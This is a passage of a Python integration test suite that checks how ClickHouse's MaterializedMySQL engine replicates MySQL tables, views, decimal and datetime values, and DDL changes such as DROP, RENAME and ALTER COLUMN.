                "2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
    mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
    check_query(clickhouse_node, """
        SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
        small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
        unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
        _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
        _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
        """,
                "1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
    # update primary key
    mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
    check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
                " small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
                " unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
                " _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
                " _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
                "2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
                "4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
    mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
    check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
                " small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
                " unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
                " _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
                " _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
                "3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t1\n")
    mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
    check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
    clickhouse_node.query("DROP DATABASE test_database_dml")
    mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
    """Verify MySQL VIEWs are skipped (not replicated) by MaterializedMySQL.

    Only the base table should appear in SHOW TABLES on the ClickHouse side.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # existed before the mapping was created
    mysql_node.query("CREATE TABLE test_database.test_table_1 ("
                     "`key` INT NOT NULL PRIMARY KEY, "
                     "unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
                     "unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
                     "unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
                     "unsigned_int INT UNSIGNED, _int INT, "
                     "unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
                     "unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
                     "/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
                     "unsigned_float FLOAT UNSIGNED, _float FLOAT, "
                     "unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
                     "_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
                     "/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
                     "_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
    # A view over the base table; it must NOT be materialized in ClickHouse.
    mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
    # it already has some data
    mysql_node.query("""
        INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
        '2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
        """)
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    # Only the base table is expected; the view must be absent.
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
    """Verify replication of fractional DATETIME/TIMESTAMP and wide DECIMAL.

    Checks sub-second rounding/padding to the declared precision
    (DateTime(6), TIMESTAMP(3)) and DECIMAL(65, 30) extremes, both for a
    table that exists before the mapping (initial dump path, test_table_1)
    and one created after it (binlog path, test_table_2).
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
    mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
    # Decimal boundary values are built programmatically: max/min
    # DECIMAL(65,30) and +/- the smallest representable fraction.
    mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
    mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
    clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
    assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
    # Note row 4: '.9999' rounds UP to TIMESTAMP(3) -> 01:02:04.000.
    check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
                "1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
                "3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
    # Same values through the binlog replication path.
    mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
    mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
    check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
                "1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
                "3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
    clickhouse_node.query("DROP DATABASE test_database_dt")
    mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify DROP TABLE and TRUNCATE TABLE replication.

    Exercises both statements issued before the mapping exists (initial
    dump) and after it (binlog replication).
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
    mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
    # test_table_1 is dropped before the mapping; it must not reappear.
    mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
    mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
    mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
    # Re-create test_table_1 after the mapping: arrives via binlog.
    mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
                "1\n2\n3\n4\n5\n6\n")
    # DROP and TRUNCATE after the mapping must also replicate.
    mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
    mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
    check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
    clickhouse_node.query("DROP DATABASE test_database_drop")
    mysql_node.query("DROP DATABASE test_database_drop")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify CREATE TABLE replication, before and after the mapping exists."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
    mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
    # existed before the mapping was created
    mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    # it already has some data
    mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
            service_name))
    # Check for pre-existing status
    assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
                "1\n2\n3\n5\n6\n7\n")
    # Table created after the mapping: replicated via the binlog.
    mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
    check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
                "1\n2\n3\n4\n5\n6\n")
    clickhouse_node.query("DROP DATABASE test_database_create")
    mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify RENAME TABLE replication, before and after the mapping exists."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
    mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
    # Rename before the mapping: only the final name should be dumped.
    mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
    # Rename after the mapping: replicated via the binlog.
    mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
    clickhouse_node.query("DROP DATABASE test_database_rename")
    mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify ALTER TABLE ... ADD COLUMN replication.

    Covers plain ADD, FIRST, AFTER and DEFAULT forms, both before the
    mapping (column order picked up by the dump) and after it (binlog DDL).
    MySQL 5.7 cannot use an expression default, hence the service_name
    branch choosing "0" vs "(id)".
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
    mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
    mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
    mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
    mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
        "0" if service_name == "mysql57" else "(id)"))
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
    # Column order in DESC must honor FIRST/AFTER; _sign/_version are the
    # engine's internal materialized columns.
    check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
                "add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Multi-column ALTERs after the mapping, replicated via the binlog.
    mysql_node.query(
        "ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
    mysql_node.query(
        "ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
            "0" if service_name == "mysql57" else "(id)"))
    default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
    check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
                "add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
    check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
                "1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
    clickhouse_node.query("DROP DATABASE test_database_add")
    mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify ALTER TABLE ... DROP COLUMN replication, before and after mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
    mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
    # Column dropped before the mapping must not appear in ClickHouse.
    mysql_node.query(
        "CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
    check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Column dropped after the mapping: replicated via the binlog.
    mysql_node.query(
        "CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
    check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
    check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
    clickhouse_node.query("DROP DATABASE test_database_alter_drop")
    mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify ALTER TABLE ... RENAME COLUMN replication, before and after mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
    mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
    # maybe should test rename primary key?
    mysql_node.query(
        "CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Rename after the mapping: replicated via the binlog.
    mysql_node.query(
        "CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
    check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
    check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
                "1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
    clickhouse_node.query("DROP DATABASE test_database_alter_rename")
    mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify ALTER TABLE ... MODIFY COLUMN replication.

    Dropping NOT NULL maps the column to Nullable(Int32) in ClickHouse;
    also checks the FIRST and AFTER position modifiers.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
    mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
    # maybe should test rename primary key?
    mysql_node.query(
        "CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
    check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # MODIFY after the mapping: replicated via the binlog.
    mysql_node.query(
        "CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
    check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Position modifiers must reorder columns on the ClickHouse side too.
    mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
    check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
                "modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
    check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
    check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
    clickhouse_node.query("DROP DATABASE test_database_alter_modify")
    mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify combined ALTER (DROP COLUMN + chained RENAME TO) replication.

    A single ALTER statement both drops a column and renames the table
    twice; only the final name/schema should be visible in ClickHouse.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
    mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query(
        "CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
    mysql_node.query(
        "ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
    check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Same combined ALTER after the mapping: replicated via the binlog.
    mysql_node.query(
        "CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
